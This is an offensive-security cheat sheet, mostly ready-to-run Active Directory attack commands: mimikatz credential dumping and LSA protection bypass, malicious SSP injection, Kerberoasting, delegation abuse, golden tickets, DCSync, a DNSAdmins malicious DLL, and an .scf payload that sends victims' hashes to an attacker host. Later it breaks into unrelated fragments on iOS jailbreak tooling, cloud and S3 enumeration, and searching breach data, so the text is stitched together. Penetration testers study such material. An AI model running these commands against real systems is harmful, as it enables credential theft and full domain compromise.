Enumerate Other Domains: Get-Domain -Domain <DomainName>
Get Domain SID: Get-DomainSID
Get Domain Policy:
Get-DomainPolicy
#Shows the domain's policy configuration for system access and Kerberos
Get-DomainPolicy | Select-Object -ExpandProperty SystemAccess
Get-DomainPolicy | Select-Object -ExpandProperty KerberosPolicy
#Save all Domain Users to a file
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
#Will return specific properties of a specific user
Get-DomainUser -Identity [username] -Properties DisplayName, MemberOf | Format-List
#Enumerate users logged on a machine
Get-NetLoggedon -ComputerName <ComputerName>
#Enumerate Session Information for a machine
Get-NetSession -ComputerName <ComputerName>
#Enumerate domain machines of the current/specified domain where specific users are logged into
Find-DomainUserLocation -Domain <DomainName> | Select-Object UserName, SessionFromName
#Save all Domain Groups to a file:
Get-DomainGroup | Out-File -FilePath .\DomainGroup.txt
#Return members of a specific group (e.g. Domain Admins & Enterprise Admins)
Get-DomainGroup -Identity '<GroupName>' | Select-Object -ExpandProperty Member
Get-DomainGroupMember -Identity '<GroupName>' | Select-Object MemberDistinguishedName
#Enumerate the local groups on the local (or remote) machine. Requires local admin rights on the remote machine
Get-NetLocalGroup | Select-Object GroupName
#Enumerates members of a specific local group on the local (or remote) machine. Also requires local admin rights on the remote machine
Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain
#Return all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences
Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName
Enumerate Shares:
#Enumerate Domain Shares
Find-DomainShare
#Enumerate Domain Shares the current user has access to
Find-DomainShare -CheckShareAccess
#Enumerate "Interesting" Files on accessible shares
Find-InterestingDomainShareFile -Include *passwords*
Enum Group Policies:
Get-DomainGPO -Properties DisplayName | Sort-Object -Property DisplayName
#Enumerate all GPOs applied to a specific computer
Get-DomainGPO -ComputerIdentity <ComputerName> -Properties DisplayName | Sort-Object -Property DisplayName
#Get users that are part of a Machine's local Admin group
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity <ComputerName>
Enum OUs:
Get-DomainOU -Properties Name | Sort-Object -Property Name
Enum ACLs:
# Returns the ACLs associated with the specified account
Get-DomainObjectAcl -Identity <AccountName> -ResolveGUIDs
#Search for interesting ACEs
Find-InterestingDomainAcl -ResolveGUIDs
#Check the ACLs associated with a specified path (e.g. an SMB share)
Get-PathAcl -Path "\\Path\Of\A\Share"
Enum Domain Trust:
Get-DomainTrust
Get-DomainTrust -Domain <DomainName>
#Enumerate all trusts for the current domain and then enumerates all trusts for each domain it finds
Get-DomainTrustMapping
Enum Forest Trust:
Get-ForestDomain
Get-ForestDomain -Forest <ForestName>
#Map the Trust of the Forest
Get-ForestTrust
Get-ForestTrust -Forest <ForestName>
User Hunting: ❗ Priv Esc to Domain Admin with User Hunting: I have local admin access on a machine -> a Domain Admin has a session on that machine -> I steal their token and impersonate them -> profit!
#Finds all machines on the current domain where the current user has local admin access
Find-LocalAdminAccess -Verbose
#Find local admins on all machines of the domain
Find-DomainLocalGroupMember -Verbose
#Find computers where a Domain Admin OR a specified user has a session
Find-DomainUserLocation | Select-Object UserName, SessionFromName
#Confirming admin access
Test-AdminAccess
#Enable PowerShell Remoting on current Machine (Needs Admin Access)
Enable-PSRemoting
#Entering or Starting a new PSSession (Needs Admin Access)
$sess = New-PSSession -ComputerName <Name>
Enter-PSSession -ComputerName <Name> #OR: Enter-PSSession -Session $sess
#Execute the command and start a session
Invoke-Command -Credential $cred -ComputerName <NameOfComputer> -FilePath c:\FilePath\file.ps1
#Interact with the session
Enter-PSSession -Session $sess
#Create a new session
$sess = New-PSSession -ComputerName <NameOfComputer>
#Execute command on the session
Invoke-Command -Session $sess -ScriptBlock {$ps = Get-Process}
#Check the result of the command to confirm we have an interactive session
Invoke-Command -Session $sess -ScriptBlock {$ps}
#The commands are in Cobalt Strike format!
#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords
#(Over) Pass The Hash
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:<UserName> /ntlm:<NTLMHash> /domain:<DomainFQDN>
#List all available kerberos tickets in memory
mimikatz sekurlsa::tickets
#Dump local Terminal Services credentials
mimikatz sekurlsa::tspkg
#Parse an LSASS memory dump file (e.g. created with procdump) offline
mimikatz sekurlsa::minidump c:\temp\lsass.dmp
#List cached MasterKeys
mimikatz sekurlsa::dpapi
#List local Kerberos AES Keys
mimikatz sekurlsa::ekeys
#Dump SAM Database
mimikatz lsadump::sam
#Dump SECRETS Database
mimikatz lsadump::secrets
#Inject and dump the Domain Controller's credentials
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject
#Dump the domain's credentials without touching the DC's LSASS; also works remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all
#List and Dump local kerberos credentials
mimikatz kerberos::list /dump
#Pass The Ticket
mimikatz kerberos::ptt <PathToKirbiFile>
#List TS/RDP sessions
mimikatz ts::sessions
#List Vault credentials
mimikatz vault::list
❗ What if mimikatz fails to dump credentials because of LSA Protection controls?
LSA as a Protected Process (Kernel Land Bypass)
#Check if LSA runs as a protected process by checking whether the registry value "RunAsPPL" is set to 0x1
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
#Next, upload mimidriver.sys from the official mimikatz repo to the same folder as your mimikatz.exe
#Now let's load mimidriver.sys into the system
mimikatz # !+
#Now let's remove the protection flags from the lsass.exe process
mimikatz # !processprotect /process:lsass.exe /remove
#Finally, run the logonpasswords function to dump LSASS
mimikatz # sekurlsa::logonpasswords
LSA as a Protected Process (Userland "Fileless" Bypass)
LSA running as a virtualized process (LSAISO) by Credential Guard
#Check if a process called lsaiso.exe exists on the running processes
tasklist | findstr lsaiso
#If it does, there isn't a way to dump LSASS; we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
#Let's inject our own malicious Security Support Provider into memory; for this example I'll use the one mimikatz provides
mimikatz # misc::memssp
#Now every user session and authentication on this machine will get logged, and plaintext credentials will be captured and dumped into c:\windows\system32\mimilsa.log
If the host we want to lateral move to has "RestrictedAdmin" enabled, we can pass the hash using the RDP protocol and get an interactive session without the plaintext password.
Mimikatz:
#We execute pass-the-hash using mimikatz and spawn an instance of mstsc.exe with the "/restrictedadmin" flag
privilege::debug
sekurlsa::pth /user:<Username> /domain:<DomainName> /ntlm:<NTLMHash> /run:"mstsc.exe /restrictedadmin"
#Then just click OK on the RDP dialog and enjoy an interactive session as the user we impersonated
❗ If Restricted Admin mode is disabled on the remote machine, we can connect to the host using another tool/protocol like psexec or winrm and enable it by creating the following registry value and setting it to zero: "HKLM:\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin".
By putting these files in a writeable share, the victim only has to open File Explorer and navigate to the share. Note that the file doesn't need to be opened and the user doesn't need to interact with it, but it must be at the top of the file system, or just visible in the Explorer window, in order to be rendered. Use Responder to capture the hashes.
❗ .scf file attacks won't work on the latest versions of Windows.
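For reference, a minimal .scf payload written into the share looks like the following sketch (the share path and the UNC path pointing back at the Responder host are placeholders; the leading @ in the filename keeps it at the top of the directory listing):

```shell
# Write a minimal SCF payload into the writeable share (IP/paths are example values)
cat > ./@evil.scf << 'EOF'
[Shell]
Command=2
IconFile=\\10.10.14.2\share\icon.ico
[Taskbar]
Command=ToggleDesktop
EOF
```

When Explorer renders the directory, it fetches the icon from the attacker's UNC path, leaking the victim's NetNTLM hash to Responder.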
WUT IS DIS?: Any standard domain user can request a TGS ticket for any SPN that is bound to a "user" account, extract the blob that was encrypted with the service account's password hash, and brute-force it offline.
PowerView:
#Get User Accounts that are used as Service Accounts
Get-NetUser -SPN
#Get every available SPN account, request a TGS and dump its hash
Invoke-Kerberoast
#Requesting the TGS for a single account:
Request-SPNTicket
#Export all tickets using Mimikatz
Invoke-Mimikatz -Command '"kerberos::list /export"'
AD Module:
#Get User Accounts that are used as Service Accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
#Kerberoasting and outputting to a file in a specific format
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName>
#Kerberoasting while staying "OPSEC" safe, i.e. not attempting to roast AES-enabled accounts
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /rc4opsec
#Kerberoast AES-enabled accounts
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /aes
#Kerberoast a specific user account
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /user:<username> /simple
#Kerberoast by specifying the authentication credentials
Rubeus.exe kerberoast /outfile:<fileName> /domain:<DomainName> /creduser:<username> /credpassword:<password>
WUT IS DIS?: If a domain user account does not require Kerberos preauthentication, we can request a valid TGT for that account without even having domain credentials, extract the encrypted blob, and brute-force it offline.
AD Module: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Forcefully disable Kerberos preauth on an account we have Write permissions (or more) over! Check for interesting permissions on accounts:
Hint: We add a filter, e.g. RDPUsers, to get "User Accounts" and not Machine Accounts, because Machine Account hashes are not crackable!
PowerView:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
Disable Kerberos Preauth:
Set-DomainObject -Identity <UserAccount> -XOR @{useraccountcontrol=4194304} -Verbose
Check if the value changed:
Get-DomainUser -PreauthNotRequired -Verbose
And finally execute the attack using the ASREPRoast tool.
#Get a specific account's hash:
Get-ASREPHash -UserName <UserName> -Verbose
#Get the hashes of all ASREPRoastable users:
Invoke-ASREPRoast -Verbose
Using Rubeus:
#Trying the attack for all domain users
Rubeus.exe asreproast /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
#ASREPRoast a specific user
Rubeus.exe asreproast /user:<username> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
#ASREPRoast users of a specific OU (Organizational Unit)
Rubeus.exe asreproast /ou:<OUName> /format:<hashcat|john> /domain:<DomainName> /outfile:<filename>
Using Impacket:
#Try the attack for the users listed in the file
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -outputfile <FileName>
WUT IS DIS?: If we have enough permissions (GenericAll/GenericWrite) we can set an SPN on a target account, request a TGS, then grab its blob and brute-force it offline.
PowerView:
#Check for interesting permissions on accounts:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}
#Check if the current user already has an SPN set:
Get-DomainUser -Identity <UserName> | select serviceprincipalname
#Force set the SPN on the account:
Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
AD Module:
#Check if the current user already has an SPN set
Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName
#Force set the SPN on the account:
Set-ADUser -Identity <UserName> -ServicePrincipalNames @{Add='ops/whatever1'}
Finally use any tool from before to grab the hash and kerberoast it!
If you have local administrator access on a machine, try to list shadow copies; it's an easy path to Domain Escalation.
#List shadow copies using vssadmin (needs Administrator access)
vssadmin list shadows
#List shadow copies using diskshadow
diskshadow list shadows all
#Make a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
You can dump the backed-up SAM database and harvest credentials.
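As a sketch, assuming the shadow copy exposed above is HarddiskVolumeShadowCopy1 and C:\temp is writeable, the hives can be copied out and parsed offline (the secretsdump.py step is an impacket command run on the attacker's machine):

```shell
REM Copy the SAM and SYSTEM hives out of the shadow copy (the shadow copy index is an assumption)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
REM Then parse them offline with impacket:
REM secretsdump.py -sam SAM -system SYSTEM LOCAL
```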
#By using the cred function of mimikatz we can enumerate the cred object and get information about it:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
#From the previous command we are interested in the "guidMasterKey" parameter, which tells us which master key was used to encrypt the credential
#Let's enumerate the master key:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>"
#Now, if we are in the context of the user (or SYSTEM) that the credential belongs to, we can use the /rpc flag to pass the decryption of the master key to the domain controller:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<usersid>\<MasterKeyGUID>" /rpc
#We now have the masterkey in our local cache:
dpapi::cache
#Finally we can decrypt the credential using the cached masterkey:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\<CredHash>"
WUT IS DIS?: If we have administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a high-value target or DA to connect to it, steal their TGT, then PTT and impersonate them!
Using PowerView:
#Discover domain joined computers that have Unconstrained Delegation enabled
Get-NetComputer -UnConstrained
#List tickets and check if a DA or some High Value target has stored its TGT
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
#Command to monitor any incoming sessions on our compromised server
Invoke-UserHunter -ComputerName <NameOfTheComputer> -Poll <TimeOfMonitoringInSeconds> -UserName <UserToMonitorFor> -Delay <WaitInterval> -Verbose
#Dump the tickets to disk:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
#Impersonate the user using ptt attack:
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTicket>"'
#Enumerate Users and Computers with constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
#If we have a user with Constrained Delegation, we request a valid TGT for this user using kekeo
tgt::ask /user:<UserName> /domain:<Domain's FQDN> /rc4:<hashedPasswordOfTheUser>
#Then, using the TGT we have, request a TGS for a service this user has access to through constrained delegation
tgs::s4u /tgt:<PathToTGT> /user:<UserToImpersonate>@<Domain's FQDN> /service:<Service's SPN>
#Finally use mimikatz to ptt the TGS
Invoke-Mimikatz -Command '"kerberos::ptt <PathToTGS>"'
Now we can access the service as the impersonated user!
🚩 What if we have delegation rights for only a specific SPN (e.g. TIME)?
In this case we can still abuse a feature of Kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services, not only the one we have rights for. That gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine.
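As a sketch, Rubeus exposes this through the /altservice flag of its s4u module: the TGS is requested for the SPN we are allowed to delegate to, but the service name in the ticket is swapped for the one we actually want (all values below are placeholders):

```shell
REM Request a TGS for the allowed SPN (time/target) but substitute the cifs service in the ticket
Rubeus.exe s4u /user:<UserName> /rc4:<NTLMHash> /impersonateuser:Administrator /msdsspn:time/target.domain.local /altservice:cifs /ptt
```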
WUT IS DIS?: TL;DR If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate Domain Administrator and have complete access.
First we need to enter the security context of the user/machine account that has the privileges over the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.
Exploitation Example:
#Import Powermad and use it to create a new MACHINE ACCOUNT
. .\Powermad.ps1
New-MachineAccount -MachineAccount <MachineAccountName> -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose
#Import PowerView and get the SID of our new created machine account
. .\PowerView.ps1
$ComputerSid = Get-DomainComputer <MachineAccountName> -Properties objectsid | Select -Expand objectsid
#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
#Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
#After that we need to get the RC4 hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'p@ssword!'
#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt
#Finally we can access the C$ drive of the target machine
dir \\TargetMachine.wtver.domain\C$
❗ In Constrained and Resource-Based Constrained Delegation, if we don't have the password/hash of the account with TRUSTED_TO_AUTH_FOR_DELEGATION that we try to abuse, we can use the very nice trick "tgt::deleg" from kekeo or "tgtdeleg" from Rubeus to fool Kerberos into giving us a valid TGT for that account. Then we just use the ticket instead of the hash of the account to perform the attack.
WUT IS DIS?: If a user is a member of the DNSAdmins group, they can potentially load an arbitrary DLL with the privileges of dns.exe, which runs as SYSTEM. If the DC also serves DNS, the user can escalate their privileges to DA. This exploitation process requires privileges to restart the DNS service.
Once we find a member of this group we need to compromise it (there are many ways).
Then, by serving a malicious DLL on an SMB share and configuring the DLL usage, we can escalate our privileges:
#Using dnscmd:
dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll
#Restart the DNS Service:
sc \\DNSServer stop dns
sc \\DNSServer start dns
WUT IS DIS?: If we manage to compromise a user account that is a member of the Backup Operators group, we can abuse its SeBackupPrivilege to create a shadow copy of the current state of the DC, extract the ntds.dit database file, dump the hashes, and escalate our privileges to DA.
Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow:
#Create a .txt file that will contain the shadow copy process script
Script ->{
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
}
#Execute diskshadow with our script as parameter
diskshadow /s script.txt
Next we need to access the shadow copy; we may have the SeBackupPrivilege but we can't simply copy-paste ntds.dit. We need to mimic a backup software and use Win32 API calls to copy it to an accessible folder. For this we are going to use this amazing repo:
#Importing both dlls from the repo using powershell
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
#Checking if the SeBackupPrivilege is enabled
Get-SeBackupPrivilege
#If it isn't we enable it
Set-SeBackupPrivilege
#Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\<PathToSave>\ntds.dit -Overwrite
#Dump the SYSTEM hive
reg save HKLM\SYSTEM c:\temp\system.hive
Using smbclient.py from impacket or some other tool we copy ntds.dit and the SYSTEM hive on our local machine.
Use secretsdump.py from impacket and dump the hashes.
Use psexec or another tool of your choice to PTH and get Domain Admin access.
WUT IS DIS?: If we manage to compromise a child domain of a forest and SID filtering isn't enabled (most of the time it is not), we can abuse it to escalate to Domain Administrator of the forest root domain. This is possible because of the SID History field in a Kerberos TGT, which defines the "extra" security groups and privileges.
Exploitation example:
#Get the SID of the Current Domain using PowerView
Get-DomainSID -Domain current.root.domain.local
#Get the SID of the Root Domain using PowerView
Get-DomainSID -Domain root.domain.local
#Create the Enterprise Admins SID
Format: RootDomainSID-519
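The construction is just string concatenation: Enterprise Admins is the well-known RID 519 appended to the forest root domain SID (the SID below is an example value):

```shell
# Enterprise Admins = forest root domain SID + well-known RID 519
ROOT_DOMAIN_SID="S-1-5-21-1004336348-1177238915-682003330"  # example root domain SID
EA_SID="${ROOT_DOMAIN_SID}-519"
echo "$EA_SID"  # S-1-5-21-1004336348-1177238915-682003330-519
```

The resulting value is what goes into the /sids parameter of the golden ticket below.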
#Forge "Extra" Golden Ticket using mimikatz
kerberos::golden /user:Administrator /domain:current.root.domain.local /sid:<CurrentDomainSID> /krbtgt:<krbtgtHash> /sids:<EnterpriseAdminsSID> /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi
#Inject the ticket into memory
kerberos::ptt \path\to\ticket\golden.kirbi
#List the DC of the Root Domain
dir \\dc.root.domain.local\C$
#Or DCsync and dump the hashes using mimikatz
lsadump::dcsync /domain:root.domain.local /all
Check for Vulnerable Certificate Templates with: Certify
Note: Certify can be executed with Cobalt Strike's execute-assembly command as well
.\Certify.exe find /vulnerable /quiet
Make sure the msPKI-Certificates-Name-Flag value is set to "ENROLLEE_SUPPLIES_SUBJECT" and that the Enrollment Rights allow Domain/Authenticated Users. Additionally, check that the pkiextendedkeyusage parameter contains the "Client Authentication" value as well as that the "Authorized Signatures Required" parameter is set to 0.
This exploit only works because these settings enable server/client authentication, meaning an attacker can specify the UPN of a Domain Admin ("DA") and use the captured certificate with Rubeus to forge authentication.
Note: If a Domain Admin is in a Protected Users group, the exploit may not work as intended. Check before choosing a DA to target.
This should return a valid certificate for the associated DA account.
The exported cert.pem and cert.key files must be consolidated into a single cert.pem file, with one line of whitespace between the END RSA PRIVATE KEY and the BEGIN CERTIFICATE.
The openssl command can be utilized to convert the certificate file into PKCS #12 format (you may be required to enter an export password, which can be anything you like).
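A sketch of that conversion step follows. The first two lines generate a throwaway self-signed key/certificate pair purely so the example runs standalone; in the real attack, cert.pem is the consolidated file from Certify's output, and the password is your chosen export password:

```shell
# Standalone demo only: create a throwaway key+cert so the conversion below can run anywhere
openssl req -x509 -newkey rsa:2048 -keyout cert.key -out cert.crt -days 1 -nodes -subj "/CN=demo" 2>/dev/null
cat cert.key cert.crt > cert.pem
# The actual conversion: bundle key + certificate into PKCS #12 (cert.pfx)
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx -passout pass:password
```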
Once the cert.pfx file has been exported, upload it to the compromised host (this can be done in a variety of ways, such as with PowerShell, SMB, certutil.exe, Cobalt Strike's upload functionality, etc.).
After the cert.pfx file has been uploaded to the compromised host, Rubeus can be used to request a Kerberos TGT for the DA account, which will then be imported into memory.
.\Rubeus.exe asktgt /user:<Domain Admin AltName> /domain:<domain.com> /dc:<Domain Controller IP or Hostname> /certificate:<Local Machine Path to cert.pfx> /nowrap /ptt
This should result in a successfully imported ticket, which enables an attacker to perform various malicious activities under the DA user context, such as a DCSync attack.
#DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DomainName>\<AnyDomainUser>"'
#DCsync using secretsdump.py from impacket with NTLM authentication
secretsdump.py <Domain>/<Username>:<Password>@<DC's IP or FQDN> -just-dc-ntlm
#DCsync using secretsdump.py from impacket with Kerberos authentication
secretsdump.py -no-pass -k <Domain>/<Username>@<DC's IP or FQDN> -just-dc-ntlm
Tip: /ptt -> inject ticket on current running session /ticket -> save the ticket on the system for later use
WUT IS DIS?: Every DC has a local Administrator account whose password is the DSRM password, a Safe Mode backup password. We can dump it and then PTH its NTLM hash to get local Administrator access to the DC!
#Dump DSRM password (needs DA privs):
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <DC's Name>
#This is a local account, so we can PTH and authenticate!
#BUT we need to alter the behaviour of the DSRM account before pth:
#Connect on DC:
Enter-PSSession -ComputerName <DC's Name>
#Alter the logon behaviour in the registry:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD -Verbose
#If the property already exists:
Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -Verbose
WUT IS DIS?: We can set our own SSP by dropping a custom DLL, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords of users that log on!
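A sketch of registering mimilib as an extra SSP, run elevated on the target. The package list below is typical but an assumption; read the existing "Security Packages" value first and append mimilib to it rather than overwriting blindly:

```shell
REM Drop mimilib.dll next to LSASS and append it to the LSA "Security Packages" list
copy mimilib.dll %systemroot%\system32\
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /f
REM After a reboot, captured logons land in %systemroot%\system32\kiwissp.log
```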
WUT IS DIS?: If we have Domain Admin rights on a domain that has a bidirectional trust relationship with another forest, we can get the trust key and forge our own inter-realm TGT.
⚠️The access we will have will be limited to what our DA account is configured to have on the other Forest!
Using Mimikatz: ❗ Tickets -> .kirbi format
Then ask for a TGS to the external forest for any service using the inter-realm TGT, and access the resource!
#Dump the trust key
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
#Forge an inter-realm TGT using the Golden Ticket attack
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<OurDomain> /sid:<OurDomainSID> /rc4:<TrustKey> /service:krbtgt /target:<TheTargetDomain> /ticket:<PathToSaveTheGoldenTicket>"'
Gather information about the instance: Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Abusing SQL Database Links: WUT IS DIS?: A database link allows a SQL Server to access other resources, like another SQL Server. If we have two linked SQL Servers we can execute stored procedures on them. Database links also work across forest trusts!
Check for existing Database Links:
#Check for existing Database Links:
#PowerUpSQL:
Get-SQLServerLink -Instance <SPN> -Verbose
#MSSQL Query:
select * from master..sysservers
Then we can use queries to enumerate other links from the linked Database:
#Manually:
select * from openquery("LinkedDatabase", 'select * from master..sysservers')
#PowerUpSQL (Will Enum every link across Forests and Child Domain of the Forests):
Get-SQLServerLinkCrawl -Instance <SPN> -Verbose
#Then we can execute commands on the machines where the SQL service runs using xp_cmdshell
#Or if it is disabled enable it:
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "SPN"
WUT IS DIS?: TL;DR If we have a bidirectional trust with an external forest and we manage to compromise a machine on the local forest that has unconstrained delegation enabled (DCs have this by default), we can use the printerbug to force the DC of the external forest's root domain to authenticate to us. Then we can capture its TGT, inject it into memory, and DCsync to dump its hashes, giving us complete access over the whole forest.
#Start monitoring for TGTs with rubeus:
Rubeus.exe monitor /interval:5 /filteruser:target-dc$
#Execute the printerbug to trigger the forced authentication of the target DC to our machine
SpoolSample.exe target-dc$.external.forest.local dc.compromised.domain.local
#Get the base64 captured TGT from Rubeus and inject it into memory:
Rubeus.exe ptt /ticket:<Base64ValueofCapturedTicket>
#Dump the hashes of the target domain using mimikatz:
lsadump::dcsync /domain:external.forest.local /all
Note: There are plenty of different tools and methodologies when it comes to iOS pentesting and I won't be able to explain all of them; only my methodology will be shared here.
Prerequisites:
1: A Jailbroken iOS device
Setting up the lab and installing basic tools:
1: Hope you already have the Frida and Objection tools on your system; if not, install them
4: Cydia Application: Basically, Cydia is a third-party application installer, similar to the App Store, developed for jailbroken iOS devices. If you are jailbreaking your device with Checkra1n or Uncover, the Cydia app will automatically get installed on your device.
What if Cydia wasn't installed during the jailbreak:
In case of Checkra1n, you can manually install Cydia from the Checkra1n app.
In case of Uncover, you can enable the Reinstall Cydia option from the Uncover app settings and start jailbreaking.
After the jailbreaking process, the Cydia app can be found on the device.
Method for installing Tweaks on the Jailbroken iOS device:
1: With the help of Cydia
Step 1: Add the repo URL of the required Cydia tweak in the Sources section
Step 2: After adding the source, you can search for the tweak in the Search section
Step 3: Select the tweak and install it; respring the device if needed.
2: Direct method:
Installing tweaks from their .deb files through an OpenSSH terminal
Step 1: Find the tweak's .deb file from its source.
Step 2: Copy the file link and SSH into the iOS device as the root user
Step 3: Download the .deb file using wget
Step 4: Make the file executable with "chmod +x file.deb" and install it using the "dpkg" command
Step 5: That's it; now the tweak will be installed on your device
Dependencies:
The following packages should be installed on the device:
Cydia Substrate
PreferenceLoader
Installing the required Cydia Tweaks:
Tweaks are basically third-party modifications that can be used to bypass certain defenses set up in the target iOS applications. A lot of tweaks are available, but here I am listing the necessary ones.
Note: Most of the Jailbreak Detection Bypass and SSL Bypass tweaks can be found in the device settings after installation.
So that's it, guys; we're almost ready to go. We will kickstart our first iOS application pentest in Part 2. If I have missed something in this part, we will cover it in the next one. Stay tuned, happy hacking :)
--write-test: This option tells the script to write a test file. The purpose and content of the test file depend on the implementation of the cloudhunter.py script.
--open-only: This option specifies that the script should only check for open ports or services on the target URL, which in this case is http://example.com. It indicates that the script will not attempt any other type of scanning or analysis.
http://example.com: This is the target URL that the script will perform the open-port check on. In this example it is set to http://example.com, but in a real scenario you would replace it with the actual URL you want to test.
By replacing <domain> with an actual domain name, the command would attempt to retrieve information specific to that domain using the cf enum tool. The details of what kind of information is gathered and how it is presented depend on the specific implementation of the tool being used.
ffuf: This is the name of the tool or command being executed.
-w /path/to/seclists/Discovery/Web-Content/api.txt: This option specifies the wordlist (-w) to be used for fuzzing. The wordlist file, located at /path/to/seclists/Discovery/Web-Content/api.txt, contains a list of potential input values or payloads that will be tested against the target URL.
-u https://example.com/FUZZ: This option defines the target URL (-u) for the fuzzing process. The string FUZZ acts as a placeholder that will be replaced by the values from the wordlist during the fuzzing process. In this case the target URL is https://example.com/FUZZ, where FUZZ will be substituted with different payloads from the wordlist.
-mc all: This option specifies the match condition (-mc) for the responses received from the target server. In this case, all indicates that all responses, regardless of HTTP status code, will be considered valid matches.
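Put together, the options described above assemble into a single invocation (paths and target are the example values from the text):

```shell
# Fuzz API endpoint names against the target, keeping every response regardless of status code
ffuf -w /path/to/seclists/Discovery/Web-Content/api.txt -u https://example.com/FUZZ -mc all
```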
By providing the --bucket parameter followed by a specific value (gwen001-test002), the script will attempt to brute-force Amazon S3 buckets using that particular value as the target. The script likely iterates through different bucket names, trying each one until a valid or accessible bucket is found.
Data Breaches
fd -t f -e txt . /path/to/data/breaches: This command uses the fd utility to search for files (-t f) with the .txt extension (-e txt) under /path/to/data/breaches. The . is the search pattern (here it matches everything). fd prints the paths of all matching files.
xargs ag -i "keyword": This command takes the paths output by fd and passes them as arguments to ag (The Silver Searcher) via xargs. ag is a tool for searching text files; -i enables case-insensitive matching, and "keyword" is the term being searched for.
